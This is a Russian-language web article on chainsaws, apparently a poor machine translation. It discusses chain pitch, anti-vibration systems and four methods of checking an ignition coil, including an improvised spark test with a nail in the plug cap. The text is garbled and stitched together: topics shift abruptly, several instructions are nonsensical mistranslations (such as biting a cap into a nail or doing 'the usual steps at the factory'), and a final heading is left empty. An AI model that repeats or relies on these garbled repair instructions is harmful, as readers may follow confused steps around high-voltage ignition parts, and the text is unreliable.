Этот шаг отличается высокопроизводительной цепочкой с большими связями. Эти цепи используются на комбайнах и мощных лесозаготовителях. Большой шаг, благодаря этому, больший слой, удаляется за один проход, но, соответственно, сопротивление обрабатываемого материала также выше. Дополнительные свойства

https://www.youtube.com/watch?v=3L-ja5c7ObY

Наличие антивибрационной системы

Прежде всего, использование такой системы необходимо на профессиональных моделях бензопил, так как длительное использование мощного вибрирующего инструмента отрицательно влияет на соединения и может привести к серьезным последствиям.

Зависимость влияния элементов цепи на материал: меньший шаг. меньший съемный слой за один проход, соответственно, и сопротивление древесины также меньше. В результате уровень вибрации естественным образом снижается.

При отсутствии в приборе нормальной антивибрационной системы несколько лет работы могут привести к тяжелым последствиям, начиная от нарушений кровообращения и заканчивая более серьезными заболеваниями.

Однако некоторые бытовые бензопилы не имеют антивибрационной системы.

Его отсутствие объясняется, во-первых, короткой продолжительностью использования инструментов, а во-вторых, тем, что они не развивают большую мощность и цепочки на них не так велики.

Покупая бензопилу, покупатели часто спрашивают о скорости распиливания древесины с помощью конкретной копии цепной пилы (например, нужно ли «раздавливать» весь инструмент при работе). Ответ: Прежде всего, это зависит от состояния пильной гарнитуры и, в частности, цепи.

  1. Измерение сопротивления катушки. Этот метод используется не всегда: во-первых, необходимо знать параметры сопротивления катушки. Во-вторых, зажигание, помимо индуктора, содержит полупроводниковые элементы для генерации желаемого импульса высокого напряжения. Поэтому, пытаясь навести магнит через высоковольтные и отрицательные провода, мы получаем либо «разрыв цепи», либо огромное сопротивление. Если схема все еще звонит, это, скорее всего, неисправность.
  2. Используя тестер искры. Он установлен в разомкнутой цепи между свечой зажигания и катушкой зажигания высокого напряжения. Устройство дорогое и используется в основном в серьезных сервисных центрах.
  3. Со свечой Выверните свечу и прикрепите корпус к цилиндру. Потяните стартер и наблюдайте искру между контактами. Этот метод является приблизительным и не дает полного представления о состоянии катушки зажигания, поскольку свеча зажигания не находится под давлением и маховик будет вращаться быстрее из-за отсутствия сжатия в двигателе (свеча зажигания выключена )
  4. «Варварский» способ. Используется на свой страх и риск в безвыходных ситуациях.
  • снимите крышку со свечи и вставьте в нее гвоздь. Будьте осторожны, чтобы не повредить внутреннюю часть колпачка, затем наденьте его на свечу и используйте. Шапку в ноготь лучше откусить. В противном случае это может быть трудно получить.
  • нанесите гвоздь на 6-7 мм от цилиндра.
  • «Запустите» двигатель, то есть выполните обычные шаги на заводе. Это заставит систему зажигания работать. Обратите внимание, что свеча должна быть ввернута в отверстие свечи.
  • Ищите наличие и цвет искры. В идеале искра должна быть «сильной» и ярко-синей. Все остальное является неисправностью.
  • Важные моменты:

Оставьте комментарий

Adblock
detector